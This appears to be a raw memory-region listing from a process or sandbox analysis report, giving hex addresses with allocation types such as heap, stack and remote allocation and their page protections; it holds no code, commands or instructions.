trusted library allocation
page read and write
205418B7000
trusted library allocation
page read and write
296B32E0000
trusted library allocation
page read and write
2E91000
trusted library allocation
page read and write
53DF000
stack
page read and write
433A000
trusted library allocation
page read and write
59F0000
trusted library allocation
page read and write
2B1C000
trusted library allocation
page read and write
28BEBFF000
stack
page read and write
B3E000
stack
page read and write
1660000
trusted library allocation
page execute and read and write
12D52610000
direct allocation
page execute and read and write
D8D95FD000
stack
page read and write
29A73A5E000
heap
page read and write
1A956AAF000
trusted library allocation
page read and write
2D87000
trusted library allocation
page read and write
327D000
trusted library allocation
page read and write
2F4E000
stack
page read and write
2C61000
trusted library allocation
page read and write
BA0000
heap
page read and write
2DC6000
trusted library allocation
page read and write
5BBE000
stack
page read and write
205316A7000
trusted library allocation
page read and write
1A946728000
trusted library allocation
page read and write
2053199A000
trusted library allocation
page read and write
215E906E000
trusted library allocation
page read and write
5870000
trusted library allocation
page read and write
1A946864000
trusted library allocation
page read and write
5A90000
trusted library allocation
page read and write
15E0000
trusted library allocation
page read and write
13D0000
trusted library allocation
page read and write
2763FF11000
trusted library allocation
page read and write
29A73B60000
trusted library allocation
page read and write
2F6E000
stack
page read and write
215E7701000
heap
page read and write
1A956947000
trusted library allocation
page read and write
2053197A000
trusted library allocation
page read and write
1A956ADD000
trusted library allocation
page read and write
29B7000
trusted library allocation
page read and write
F4A000
trusted library allocation
page execute and read and write
7FF7C0FD6000
trusted library allocation
page read and write
DB40FFB000
stack
page read and write
2E9C000
stack
page read and write
63D437E000
stack
page read and write
1B8046C0000
heap
page read and write
4A1E000
stack
page read and write
5D89000
heap
page read and write
296B3280000
trusted library section
page read and write
2740D620000
heap
page read and write
2E70000
trusted library allocation
page read and write
4FAE000
stack
page read and write
29CA000
trusted library allocation
page read and write
5F90000
trusted library section
page read and write
4A00000
trusted library allocation
page read and write
1A946AF7000
trusted library allocation
page read and write
215E77E1000
trusted library allocation
page read and write
2FD7000
trusted library allocation
page read and write
D17000
heap
page read and write
1A956BE8000
trusted library allocation
page read and write
1A9469D4000
trusted library allocation
page read and write
1A946A8C000
trusted library allocation
page read and write
2DC3000
trusted library allocation
page read and write
1A956BE3000
trusted library allocation
page read and write
63D558A000
stack
page read and write
296B2DF0000
heap
page read and write
6450000
trusted library allocation
page execute and read and write
20541B32000
trusted library allocation
page read and write
34D6000
trusted library allocation
page read and write
335A000
trusted library allocation
page read and write
CA4000
heap
page read and write
2763F8FA000
heap
page read and write
14079F000
remote allocation
page execute and read and write
2F7C000
trusted library allocation
page read and write
215E912F000
trusted library allocation
page read and write
1A9466DA000
trusted library allocation
page read and write
30A7000
trusted library allocation
page read and write
FB5000
trusted library allocation
page read and write
15F0000
trusted library allocation
page read and write
29D6000
trusted library allocation
page read and write
D8D75FE000
stack
page read and write
5530000
trusted library allocation
page read and write
20541751000
trusted library allocation
page read and write
1A946885000
trusted library allocation
page read and write
29A101B1000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
14F8000
trusted library allocation
page read and write
154E5A61000
trusted library allocation
page read and write
57C0000
trusted library allocation
page execute and read and write
2052F9EE000
heap
page read and write
4EEE000
stack
page read and write
5680000
trusted library allocation
page read and write
5EBA000
trusted library section
page read and write
215E768A000
heap
page read and write
21580214000
heap
page read and write
1650000
trusted library allocation
page read and write
157F000
stack
page read and write
51B0000
trusted library allocation
page read and write
CE2000
trusted library allocation
page read and write
58FE000
stack
page read and write
20541821000
trusted library allocation
page read and write
20531794000
trusted library allocation
page read and write
1B81637E000
trusted library allocation
page read and write
215E766D000
heap
page read and write
2DA2000
trusted library allocation
page read and write
5A98000
trusted library allocation
page read and write
5910000
trusted library allocation
page read and write
2FF0000
trusted library allocation
page read and write
1220000
heap
page read and write
7FF7C1220000
trusted library allocation
page read and write
5D94000
heap
page read and write
215E877A000
trusted library allocation
page read and write
2054174C000
trusted library allocation
page read and write
5EAC000
heap
page read and write
2763F6C6000
heap
page read and write
5ED5000
heap
page read and write
7FF7C0FD0000
trusted library allocation
page read and write
296B2BF0000
heap
page read and write
20541565000
trusted library allocation
page read and write
2A01000
trusted library allocation
page read and write
2EAC000
heap
page read and write
205416D9000
trusted library allocation
page read and write
126E000
heap
page read and write
5EF5000
heap
page read and write
20531597000
trusted library allocation
page read and write
29A00001000
trusted library allocation
page read and write
1603000
trusted library allocation
page execute and read and write
4815000
trusted library allocation
page read and write
1B804630000
heap
page read and write
1A95678F000
trusted library allocation
page read and write
1A956C83000
trusted library allocation
page read and write
7FF7C1026000
trusted library allocation
page execute and read and write
7FF7C1210000
trusted library allocation
page read and write
215801BA000
heap
page read and write
1404F4000
remote allocation
page execute and read and write
5850000
trusted library allocation
page read and write
154E4050000
heap
page read and write
5D5F000
heap
page read and write
13B0000
heap
page read and write
13F3000
trusted library allocation
page execute and read and write
15C0000
trusted library allocation
page read and write
5C50000
trusted library allocation
page read and write
296B441B000
trusted library allocation
page read and write
12D50C86000
heap
page read and write
1A9568D3000
trusted library allocation
page read and write
5A20000
trusted library allocation
page execute and read and write
20541683000
trusted library allocation
page read and write
3351000
trusted library allocation
page read and write
2053166D000
trusted library allocation
page read and write
1616000
trusted library allocation
page execute and read and write
1A946788000
trusted library allocation
page read and write
2921000
trusted library allocation
page read and write
2DBF000
trusted library allocation
page read and write
1A944BBE000
heap
page read and write
5EF1000
heap
page read and write
2052F7EB000
heap
page read and write
296B33D0000
heap
page read and write
F23000
trusted library allocation
page execute and read and write
445B000
trusted library allocation
page read and write
1A956A08000
trusted library allocation
page read and write
2DAA000
trusted library allocation
page read and write
B80000
heap
page read and write
3237000
trusted library allocation
page read and write
205417B7000
trusted library allocation
page read and write
B76000
trusted library allocation
page read and write
215801D5000
heap
page read and write
1A9469DB000
trusted library allocation
page read and write
2053163F000
trusted library allocation
page read and write
1A946667000
trusted library allocation
page read and write
2C98000
trusted library allocation
page read and write
1A956D4F000
trusted library allocation
page read and write
14BD000
heap
page read and write
1580000
trusted library allocation
page read and write
2053177D000
trusted library allocation
page read and write
29A71E97000
heap
page read and write
29A71DB0000
heap
page read and write
13FD000
trusted library allocation
page execute and read and write
14A0000
heap
page read and write
3180000
heap
page execute and read and write
3191000
trusted library allocation
page read and write
2F2E000
stack
page read and write
5F7E000
stack
page read and write
B80000
trusted library allocation
page read and write
154E5A72000
trusted library allocation
page read and write
21580150000
heap
page read and write
162B000
trusted library allocation
page execute and read and write
5660000
trusted library allocation
page read and write
2FBE000
trusted library allocation
page read and write
54B0000
trusted library allocation
page execute and read and write
1407A3000
remote allocation
page execute and read and write
296B2DE0000
trusted library section
page read and write
3931000
trusted library allocation
page read and write
1A95683D000
trusted library allocation
page read and write
215E6CD0000
heap
page read and write
58A0000
trusted library allocation
page read and write
DB41C4D000
stack
page read and write
1A9466A2000
trusted library allocation
page read and write
20531721000
trusted library allocation
page read and write
5FF0000
heap
page read and write
5880000
trusted library allocation
page read and write
1400000
heap
page read and write
20541889000
trusted library allocation
page read and write
1A956CE5000
trusted library allocation
page read and write
154F5DF2000
trusted library allocation
page read and write
29A73950000
heap
page read and write
20541BE2000
trusted library allocation
page read and write
1A944BB0000
heap
page read and write
7F310000
trusted library allocation
page execute and read and write
215E6F07000
heap
page read and write
3DF0000
trusted library allocation
page read and write
20541991000
trusted library allocation
page read and write
29EB000
trusted library allocation
page read and write
5610000
heap
page read and write
5960000
trusted library allocation
page read and write
1A956892000
trusted library allocation
page read and write
1A9569B0000
trusted library allocation
page read and write
3927000
trusted library allocation
page read and write
174A000
heap
page read and write
1404DB000
remote allocation
page execute and read and write
101F000
stack
page read and write
3256000
trusted library allocation
page read and write
60CA000
heap
page read and write
68FE000
stack
page read and write
1A956B0A000
trusted library allocation
page read and write
5C20000
trusted library allocation
page read and write
515E000
stack
page read and write
5990000
trusted library allocation
page read and write
4DF0000
heap
page execute and read and write
1752000
heap
page read and write
2F87000
trusted library allocation
page read and write
DB40BFD000
stack
page read and write
4555000
trusted library allocation
page read and write
3150000
heap
page execute and read and write
29BB000
trusted library allocation
page read and write
2C3D000
trusted library allocation
page read and write
1A946ADC000
trusted library allocation
page read and write
52CE000
stack
page read and write
5F4E000
stack
page read and write
2763FF8C000
trusted library allocation
page read and write
2C0B000
trusted library allocation
page read and write
5F85000
heap
page read and write
57B0000
trusted library allocation
page read and write
140468000
remote allocation
page execute and read and write
7FF7C0F43000
trusted library allocation
page execute and read and write
205319C3000
trusted library allocation
page read and write
1A956A75000
trusted library allocation
page read and write
5F41000
heap
page read and write
D8D85FD000
stack
page read and write
5F60000
trusted library allocation
page read and write
15A0000
trusted library allocation
page read and write
5D52000
heap
page read and write
1140000
trusted library allocation
page read and write
30F6000
trusted library allocation
page read and write
DB41ACC000
stack
page read and write
1A94682C000
trusted library allocation
page read and write
2763F6C9000
heap
page read and write
154F5A6E000
trusted library allocation
page read and write
110E000
stack
page read and write
DF2000
unkown
page readonly
33A9000
trusted library allocation
page read and write
2B73000
trusted library allocation
page read and write
18F0000
heap
page read and write
2763FE30000
heap
page execute and read and write
2973000
trusted library allocation
page read and write
215E83CC000
trusted library allocation
page read and write
2DBB000
trusted library allocation
page read and write
5A00000
trusted library allocation
page read and write
215E6E89000
heap
page read and write
1A944B20000
heap
page read and write
5C2A000
trusted library allocation
page read and write
5F47000
heap
page read and write
3981000
trusted library allocation
page read and write
215E7685000
heap
page read and write
140475000
remote allocation
page execute and read and write
154F5F28000
trusted library allocation
page read and write
2763F630000
heap
page read and write
FA3000
trusted library allocation
page read and write
5CD0000
trusted library allocation
page read and write
154E3E75000
heap
page read and write
1404E5000
remote allocation
page execute and read and write
FF0000
heap
page read and write
6CE0000
trusted library allocation
page read and write
1A9466B7000
trusted library allocation
page read and write
140465000
remote allocation
page execute and read and write
205315CA000
trusted library allocation
page read and write
2052F7B0000
heap
page read and write
1B8062F0000
heap
page execute and read and write
15B2000
trusted library allocation
page read and write
1294000
heap
page read and write
1124000
heap
page read and write
52BD000
stack
page read and write
27F0000
heap
page execute and read and write
CE7000
trusted library allocation
page execute and read and write
7FF7C0F44000
trusted library allocation
page read and write
1A946984000
trusted library allocation
page read and write
205318A6000
trusted library allocation
page read and write
154FE14E000
heap
page read and write
2DF7000
trusted library allocation
page read and write
2B40000
trusted library allocation
page read and write
2E80000
heap
page execute and read and write
DB41B47000
stack
page read and write
4B4E000
stack
page read and write
1080000
heap
page read and write
2D8D000
trusted library allocation
page read and write
5730000
trusted library allocation
page execute and read and write
205314B8000
trusted library allocation
page read and write
1A946500000
heap
page read and write
1590000
heap
page read and write
58C0000
trusted library allocation
page read and write
29A1000E000
trusted library allocation
page read and write
30F2000
trusted library allocation
page read and write
4331000
trusted library allocation
page read and write
2E14000
trusted library allocation
page read and write
215E877D000
trusted library allocation
page read and write
C7335FF000
stack
page read and write
2C3B000
trusted library allocation
page read and write
1339000
heap
page read and write
1A9469A5000
trusted library allocation
page read and write
6050000
heap
page read and write
64D0000
trusted library allocation
page execute and read and write
140789000
remote allocation
page execute and read and write
215E6EC0000
heap
page read and write
4221000
trusted library allocation
page read and write
1A944C50000
heap
page read and write
484D000
trusted library allocation
page read and write
31F8000
trusted library allocation
page read and write
322D000
trusted library allocation
page read and write
1A956951000
trusted library allocation
page read and write
20541975000
trusted library allocation
page read and write
1A946623000
trusted library allocation
page read and write
16C4000
heap
page read and write
5885000
heap
page read and write
15B6000
trusted library allocation
page execute and read and write
5AB0000
trusted library allocation
page execute and read and write
5708000
trusted library allocation
page read and write
29A71DC6000
heap
page read and write
5C4F000
trusted library allocation
page read and write
29A73A4F000
heap
page read and write
1A946892000
trusted library allocation
page read and write
215E87D6000
trusted library allocation
page read and write
154F5B27000
trusted library allocation
page read and write
20541A97000
trusted library allocation
page read and write
2E0B000
trusted library allocation
page read and write
2E1E000
trusted library allocation
page read and write
CD2000
trusted library allocation
page read and write
7FF7C0F9C000
trusted library allocation
page execute and read and write
FC0000
trusted library allocation
page read and write
20531835000
trusted library allocation
page read and write
41A1000
trusted library allocation
page read and write
2B52000
trusted library allocation
page read and write
2052F7E9000
heap
page read and write
2B5F000
trusted library allocation
page read and write
E1A8FFA000
stack
page read and write
30AE000
stack
page read and write
1A9567B7000
trusted library allocation
page read and write
1A9568BB000
trusted library allocation
page read and write
7FF7C0F3D000
trusted library allocation
page execute and read and write
5A7E000
stack
page read and write
5780000
trusted library allocation
page read and write
3D57000
trusted library allocation
page read and write
5DD8000
heap
page read and write
B37000
stack
page read and write
54C9000
trusted library allocation
page read and write
296B4722000
trusted library allocation
page read and write
296B2BF9000
heap
page read and write
1609000
trusted library allocation
page read and write
3EB1000
trusted library allocation
page read and write
49AE000
stack
page read and write
67BE000
stack
page read and write
5F50000
trusted library allocation
page execute and read and write
2C28000
trusted library allocation
page read and write
5560000
trusted library allocation
page execute and read and write
7FF7C0FDC000
trusted library allocation
page execute and read and write
36FF000
trusted library allocation
page read and write
3130000
trusted library allocation
page read and write
6280000
trusted library allocation
page read and write
7340000
trusted library allocation
page read and write
12DF000
heap
page read and write
CC3000
trusted library allocation
page read and write
1A956C7C000
trusted library allocation
page read and write
2763F652000
heap
page read and write
1B804680000
heap
page read and write
1A944C55000
heap
page read and write
7470000
trusted library allocation
page read and write
7FF7C0F4D000
trusted library allocation
page execute and read and write
4865000
trusted library allocation
page read and write
1407A7000
remote allocation
page execute and read and write
205416E7000
trusted library allocation
page read and write
58AB000
trusted library allocation
page read and write
E1A917D000
stack
page read and write
5ADE000
stack
page read and write
6510000
trusted library allocation
page read and write
E1A9278000
stack
page read and write
6DFE000
stack
page read and write
E1AA0C7000
stack
page read and write
20541681000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
1A9568FC000
trusted library allocation
page read and write
49C4000
trusted library allocation
page read and write
2052F880000
heap
page read and write
587E000
trusted library allocation
page read and write
F5B000
trusted library allocation
page execute and read and write
6000000
trusted library allocation
page read and write
5C49000
trusted library allocation
page read and write
2054164D000
trusted library allocation
page read and write
528E000
stack
page read and write
2158019A000
heap
page read and write
397D000
trusted library allocation
page read and write
1612000
trusted library allocation
page read and write
5790000
trusted library section
page read and write
215E8749000
trusted library allocation
page read and write
154F5C11000
trusted library allocation
page read and write
31BF000
stack
page read and write
1A94690B000
trusted library allocation
page read and write
2E61000
trusted library allocation
page read and write
CD0000
heap
page read and write
5F32000
trusted library allocation
page read and write
1B8046C2000
heap
page read and write
5BDE000
stack
page read and write
2C0D000
trusted library allocation
page read and write
C6E000
stack
page read and write
296B32C0000
heap
page readonly
2B4E000
trusted library allocation
page read and write
20531936000
trusted library allocation
page read and write
30A3000
trusted library allocation
page read and write
2E40000
trusted library allocation
page read and write
205314FD000
trusted library allocation
page read and write
1640000
trusted library allocation
page read and write
B92000
trusted library allocation
page read and write
1404E8000
remote allocation
page execute and read and write
163B000
trusted library allocation
page execute and read and write
583F000
stack
page read and write
154E5AA1000
trusted library allocation
page read and write
20541B98000
trusted library allocation
page read and write
7FF7C11D0000
trusted library allocation
page read and write
59C0000
trusted library allocation
page read and write
205312A0000
heap
page execute and read and write
7820000
trusted library allocation
page execute and read and write
2DD6000
trusted library allocation
page read and write
CDA000
trusted library allocation
page execute and read and write
205318EB000
trusted library allocation
page read and write
296B4767000
trusted library allocation
page read and write
5D8C000
heap
page read and write
2C26000
trusted library allocation
page read and write
29FF000
stack
page read and write
1A95679E000
trusted library allocation
page read and write
5C20000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
29A71CC0000
heap
page read and write
3403000
trusted library allocation
page read and write
2B5A000
trusted library allocation
page read and write
5E50000
heap
page read and write
1390000
heap
page read and write
28BE3FE000
stack
page read and write
1404E3000
remote allocation
page execute and read and write
2B0D000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
6180000
heap
page read and write
154FE15A000
heap
page read and write
215E9606000
trusted library allocation
page read and write
1404F9000
remote allocation
page execute and read and write
21580102000
heap
page read and write
2052FA75000
heap
page read and write
28626FD000
stack
page read and write
5860000
trusted library allocation
page execute and read and write
5F99000
heap
page read and write
29A00041000
trusted library allocation
page read and write
296B2C75000
heap
page read and write
1A944977000
heap
page read and write
F10000
heap
page read and write
12CE000
stack
page read and write
FA1000
trusted library allocation
page read and write
60F3000
heap
page read and write
7FF7C10F4000
trusted library allocation
page read and write
7FF7C0F40000
trusted library allocation
page read and write
63D43FE000
stack
page read and write
283E000
stack
page read and write
1A9567BB000
trusted library allocation
page read and write
2C37000
trusted library allocation
page read and write
1A946A67000
trusted library allocation
page read and write
1430000
trusted library allocation
page read and write
5708000
heap
page read and write
6004000
heap
page read and write
1A956943000
trusted library allocation
page read and write
F20000
heap
page read and write
7490000
trusted library allocation
page read and write
154E3D90000
heap
page read and write
5480000
trusted library allocation
page read and write
581F000
stack
page read and write
296B44A1000
trusted library allocation
page read and write
29A71F00000
heap
page read and write
4191000
trusted library allocation
page read and write
C7345FE000
stack
page read and write
5EE0000
trusted library section
page read and write
2B6B000
trusted library allocation
page read and write
5750000
trusted library allocation
page execute and read and write
296B45BA000
trusted library allocation
page read and write
205319F2000
trusted library allocation
page read and write
58D0000
trusted library allocation
page read and write
20531742000
trusted library allocation
page read and write
4DAE000
stack
page read and write
34A9000
trusted library allocation
page read and write
E1A9F4F000
stack
page read and write
2740D630000
heap
page read and write
276403E0000
trusted library allocation
page read and write
20541743000
trusted library allocation
page read and write
2F63000
trusted library allocation
page read and write
146E000
stack
page read and write
1A956781000
trusted library allocation
page read and write
215E6F90000
heap
page readonly
1970000
heap
page read and write
20531539000
trusted library allocation
page read and write
63D4A3C000
stack
page read and write
12AE000
heap
page read and write
15CB000
trusted library allocation
page execute and read and write
2DDE000
trusted library allocation
page read and write
7FF7C0F33000
trusted library allocation
page read and write
2C42000
trusted library allocation
page read and write
472F000
trusted library allocation
page read and write
1A946A6D000
trusted library allocation
page read and write
F80000
heap
page read and write
159E000
heap
page read and write
2862AFE000
stack
page read and write
59D0000
trusted library allocation
page read and write
1A956B77000
trusted library allocation
page read and write
55A0000
trusted library allocation
page read and write
2052F9E0000
heap
page read and write
5890000
trusted library allocation
page read and write
D46000
heap
page read and write
2E3E000
stack
page read and write
4504000
trusted library allocation
page read and write
5641000
heap
page read and write
2C3F000
trusted library allocation
page read and write
80D0000
trusted library allocation
page read and write
103E000
stack
page read and write
F1F000
stack
page read and write
2C6D000
trusted library allocation
page read and write
5790000
heap
page read and write
7FF7C10E0000
trusted library allocation
page read and write
129E000
heap
page read and write
215E6FD0000
trusted library allocation
page read and write
A83FFD000
stack
page read and write
205314BE000
trusted library allocation
page read and write
2E32BFE000
stack
page read and write
3FBC000
trusted library allocation
page read and write
29B3000
trusted library allocation
page read and write
1A944BA0000
trusted library allocation
page read and write
2052F816000
heap
page read and write
5590000
trusted library allocation
page read and write
63D48B8000
stack
page read and write
57A9000
heap
page read and write
2B5D000
trusted library allocation
page read and write
8090000
trusted library allocation
page execute and read and write
1020000
trusted library allocation
page read and write
1235000
heap
page read and write
12D50C58000
heap
page read and write
1A956D44000
trusted library allocation
page read and write
2052FA40000
trusted library allocation
page read and write
296B2C4E000
heap
page read and write
54E0000
trusted library allocation
page read and write
13FD000
trusted library allocation
page execute and read and write
331A000
trusted library allocation
page read and write
13E4000
trusted library allocation
page read and write
1060000
heap
page read and write
322F000
trusted library allocation
page read and write
21580080000
heap
page read and write
20541466000
trusted library allocation
page read and write
1A94669C000
trusted library allocation
page read and write
29A71E00000
heap
page read and write
53BD000
stack
page read and write
140784000
remote allocation
page execute and read and write
154E3E40000
trusted library allocation
page read and write
5C4D000
trusted library allocation
page read and write
20541675000
trusted library allocation
page read and write
1490000
trusted library allocation
page read and write
E1A8EFF000
stack
page read and write
7FF7C1000000
trusted library allocation
page execute and read and write
1200000
heap
page read and write
57DE000
heap
page read and write
30B0000
heap
page read and write
BD0000
heap
page read and write
5AC0000
trusted library allocation
page read and write
746B000
trusted library allocation
page read and write
1B8063B1000
trusted library allocation
page read and write
1B804850000
heap
page read and write
31C1000
trusted library allocation
page read and write
1B8046A9000
heap
page read and write
29D0000
trusted library allocation
page read and write
63D4837000
stack
page read and write
30B9000
heap
page read and write
2E21000
trusted library allocation
page read and write
7FF7C10C0000
trusted library allocation
page read and write
21580000000
heap
page execute and read and write
2E06000
trusted library allocation
page read and write
2B79000
trusted library allocation
page read and write
30D9000
trusted library allocation
page read and write
2F89000
heap
page read and write
2740D6B8000
heap
page read and write
1404DA000
remote allocation
page execute and read and write
296B2BD0000
heap
page read and write
AF7000
stack
page read and write
114F000
heap
page read and write
205314CD000
trusted library allocation
page read and write
E1A957C000
stack
page read and write
1154000
trusted library allocation
page read and write
215E7630000
heap
page read and write
1187000
trusted library allocation
page execute and read and write
10EC000
stack
page read and write
2B4E000
stack
page read and write
2B07000
trusted library allocation
page read and write
3545000
trusted library allocation
page read and write
5EA2000
heap
page read and write
2740D6E6000
heap
page read and write
2F72000
trusted library allocation
page read and write
58BF000
trusted library allocation
page read and write
DB419CE000
stack
page read and write
E01000
heap
page read and write
29A71DB5000
heap
page read and write
2052F7ED000
heap
page read and write
2AFF000
trusted library allocation
page read and write
49FB000
trusted library allocation
page read and write
296B3325000
heap
page read and write
F2D000
trusted library allocation
page execute and read and write
2AA4000
trusted library allocation
page read and write
2AD9000
trusted library allocation
page read and write
59A0000
trusted library allocation
page execute and read and write
29A10015000
trusted library allocation
page read and write
6140000
trusted library allocation
page execute and read and write
2763FF00000
heap
page read and write
56AA000
heap
page read and write
7FF7C0F4D000
trusted library allocation
page execute and read and write
2BCB000
trusted library allocation
page read and write
1A956CC1000
trusted library allocation
page read and write
296B2BA0000
heap
page read and write
2A10000
trusted library allocation
page read and write
7FF7C10E2000
trusted library allocation
page read and write
15BA000
trusted library allocation
page execute and read and write
2DE4000
trusted library allocation
page read and write
205314D3000
trusted library allocation
page read and write
56A9000
trusted library allocation
page read and write
55DF000
stack
page read and write
7FF7C0F22000
trusted library allocation
page read and write
1B804686000
heap
page read and write
69FF000
stack
page read and write
576E000
trusted library allocation
page read and write
215E7869000
trusted library allocation
page read and write
2DC1000
trusted library allocation
page read and write
5AF0000
trusted library allocation
page execute and read and write
296B47A7000
trusted library allocation
page read and write
5A90000
trusted library allocation
page read and write
154E5A50000
heap
page execute and read and write
205316D6000
trusted library allocation
page read and write
1404DD000
remote allocation
page execute and read and write
5D62000
heap
page read and write
F86000
heap
page read and write
215E7035000
heap
page read and write
2F46000
trusted library allocation
page read and write
10D5000
heap
page read and write
1A9569DE000
trusted library allocation
page read and write
2FCD000
trusted library allocation
page read and write
2F4C000
trusted library allocation
page read and write
1182000
trusted library allocation
page read and write
1A946660000
trusted library allocation
page read and write
7FF7C1006000
trusted library allocation
page execute and read and write
3921000
trusted library allocation
page read and write
1A944B40000
heap
page read and write
3471000
trusted library allocation
page read and write
5A10000
trusted library allocation
page read and write
57EB000
heap
page read and write
310D000
trusted library allocation
page read and write
2DA6000
trusted library allocation
page read and write
34A4000
trusted library allocation
page read and write
20531659000
trusted library allocation
page read and write
154F5A81000
trusted library allocation
page read and write
49D1000
trusted library allocation
page read and write
20531714000
trusted library allocation
page read and write
5D30000
trusted library allocation
page execute and read and write
D44000
heap
page read and write
3500000
trusted library allocation
page read and write
1A94686A000
trusted library allocation
page read and write
2A40000
heap
page read and write
32CE000
trusted library allocation
page read and write
52BE000
stack
page read and write
63D447F000
stack
page read and write
2E50000
heap
page execute and read and write
5CDE000
stack
page read and write
296B32B0000
trusted library allocation
page read and write
1627000
trusted library allocation
page execute and read and write
205314C7000
trusted library allocation
page read and write
29D4000
trusted library allocation
page read and write
CD6000
trusted library allocation
page execute and read and write
58BD000
trusted library allocation
page read and write
154F5DF4000
trusted library allocation
page read and write
215E6ECE000
heap
page read and write
F7E000
stack
page read and write
1A944B80000
trusted library allocation
page read and write
547D000
stack
page read and write
5712000
trusted library allocation
page read and write
2F5F000
trusted library allocation
page read and write
154FDA60000
trusted library allocation
page read and write
2B03000
trusted library allocation
page read and write
59F0000
trusted library allocation
page read and write
63D44F9000
stack
page read and write
551B000
trusted library allocation
page read and write
63D4ABE000
stack
page read and write
115D000
trusted library allocation
page execute and read and write
20541926000
trusted library allocation
page read and write
2053150A000
trusted library allocation
page read and write
205417F4000
trusted library allocation
page read and write
1B8166E4000
trusted library allocation
page read and write
7FF7C11F0000
trusted library allocation
page read and write
2F77000
trusted library allocation
page read and write
517E000
stack
page read and write
159D000
trusted library allocation
page execute and read and write
B82000
trusted library allocation
page read and write
2763F69E000
heap
page read and write
5CBE000
stack
page read and write
59B0000
trusted library allocation
page read and write
74B0000
trusted library allocation
page execute and read and write
3BAD000
trusted library allocation
page read and write
4EFF000
stack
page read and write
12D526F0000
heap
page read and write
3265000
trusted library allocation
page read and write
28BE7FD000
stack
page read and write
117A000
trusted library allocation
page execute and read and write
29A71F60000
trusted library allocation
page read and write
47ED000
trusted library allocation
page read and write
2053164C000
trusted library allocation
page read and write
2052FA20000
trusted library allocation
page read and write
5CFE000
stack
page read and write
1A956ACD000
trusted library allocation
page read and write
2B90000
heap
page execute and read and write
6000000
heap
page read and write
40BC000
trusted library allocation
page read and write
2B39000
trusted library allocation
page read and write
2AE9000
trusted library allocation
page read and write
205315B7000
trusted library allocation
page read and write
1A956911000
trusted library allocation
page read and write
309B000
trusted library allocation
page read and write
1610000
trusted library allocation
page read and write
B70000
heap
page read and write
20541BD0000
trusted library allocation
page read and write
5980000
trusted library allocation
page read and write
6640000
trusted library allocation
page read and write
3111000
trusted library allocation
page read and write
20541952000
trusted library allocation
page read and write
215E95BC000
trusted library allocation
page read and write
F3F000
stack
page read and write
29A0036B000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
1B804620000
heap
page read and write
109E000
heap
page read and write
DB40E7E000
stack
page read and write
2763F900000
trusted library allocation
page read and write
1A94498D000
heap
page read and write
1637000
trusted library allocation
page execute and read and write
2740D6CE000
heap
page read and write
296B32D0000
heap
page execute and read and write
2E35000
trusted library allocation
page read and write
F94000
trusted library allocation
page read and write
215E95E1000
trusted library allocation
page read and write
13CF000
stack
page read and write
1510000
heap
page read and write
3BB1000
trusted library allocation
page read and write
5EA8000
heap
page read and write
54D0000
trusted library allocation
page execute and read and write
2C6F000
trusted library allocation
page read and write
58D0000
trusted library allocation
page execute and read and write
5A00000
trusted library allocation
page read and write
56BA000
heap
page read and write
321E000
stack
page read and write
18E2000
trusted library allocation
page read and write
7FF7C0F20000
trusted library allocation
page read and write
7FF7C1140000
trusted library allocation
page read and write
5320000
trusted library allocation
page read and write
5650000
trusted library allocation
page read and write
A3C000
stack
page read and write
1B8049A5000
heap
page read and write
2740D6B0000
heap
page read and write
59FF000
stack
page read and write
215801C7000
heap
page read and write
5A00000
trusted library allocation
page read and write
2053191E000
trusted library allocation
page read and write
13F0000
trusted library allocation
page read and write
E1A94FF000
stack
page read and write
2C3C000
trusted library allocation
page read and write
5DCE000
stack
page read and write
294F000
trusted library allocation
page read and write
DB41CCE000
stack
page read and write
140785000
remote allocation
page execute and read and write
5E70000
trusted library allocation
page read and write
215E6E45000
heap
page read and write
5F30000
trusted library allocation
page read and write
351C000
trusted library allocation
page read and write
20531601000
trusted library allocation
page read and write
2DFD000
trusted library allocation
page read and write
33E6000
trusted library allocation
page read and write
5AF0000
trusted library allocation
page read and write
1A946608000
trusted library allocation
page read and write
11E7000
stack
page read and write
1A956D00000
trusted library allocation
page read and write
13E0000
trusted library allocation
page read and write
1A946850000
trusted library allocation
page read and write
5F13000
heap
page read and write
16AB000
heap
page read and write
49F9000
trusted library allocation
page read and write
4A4E000
stack
page read and write
30C2000
trusted library allocation
page read and write
1266000
heap
page read and write
5520000
trusted library allocation
page read and write
1A956CBC000
trusted library allocation
page read and write
2D8F000
trusted library allocation
page read and write
F80000
trusted library allocation
page read and write
1230000
heap
page read and write
537E000
stack
page read and write
550E000
stack
page read and write
7460000
trusted library allocation
page read and write
2ADB000
trusted library allocation
page read and write
5690000
trusted library allocation
page execute and read and write
1404EA000
remote allocation
page execute and read and write
20531756000
trusted library allocation
page read and write
296B2C36000
heap
page read and write
1A94672F000
trusted library allocation
page read and write
1404EF000
remote allocation
page execute and read and write
5A30000
trusted library allocation
page read and write
CBD000
trusted library allocation
page execute and read and write
D28000
heap
page read and write
63D42FE000
stack
page read and write
E1A92FD000
stack
page read and write
7330000
trusted library allocation
page read and write
1412000
trusted library allocation
page read and write
1590000
trusted library allocation
page read and write
29E1000
trusted library allocation
page read and write
2E50000
trusted library allocation
page read and write
12D50C50000
heap
page read and write
15C2000
trusted library allocation
page read and write
7FF7C11B0000
trusted library allocation
page read and write
63D457F000
stack
page read and write
7620000
trusted library allocation
page execute and read and write
2E40000
trusted library allocation
page execute and read and write
3120000
trusted library allocation
page read and write
2E0E000
trusted library allocation
page read and write
3462000
trusted library allocation
page read and write
176E000
stack
page read and write
2F58000
trusted library allocation
page read and write
2054199A000
trusted library allocation
page read and write
2D95000
trusted library allocation
page read and write
18F9000
heap
page read and write
7E0000
heap
page read and write
1A956C95000
trusted library allocation
page read and write
293F000
stack
page read and write
4420000
trusted library allocation
page read and write
1150000
trusted library allocation
page read and write
1A956D26000
trusted library allocation
page read and write
1680000
trusted library allocation
page read and write
5D30000
trusted library allocation
page execute and read and write
6196000
heap
page read and write
5F0E000
stack
page read and write
1A956D18000
trusted library allocation
page read and write
DB405DF000
stack
page read and write
1070000
heap
page read and write
2763F67E000
heap
page read and write
29AF000
trusted library allocation
page read and write
3381000
trusted library allocation
page read and write
2E27000
trusted library allocation
page read and write
C7339FE000
stack
page read and write
215E6F80000
trusted library allocation
page read and write
A823ED000
stack
page read and write
1604000
trusted library allocation
page read and write
7650000
trusted library allocation
page read and write
58A0000
trusted library allocation
page read and write
20531885000
trusted library allocation
page read and write
1B804930000
heap
page execute and read and write
140799000
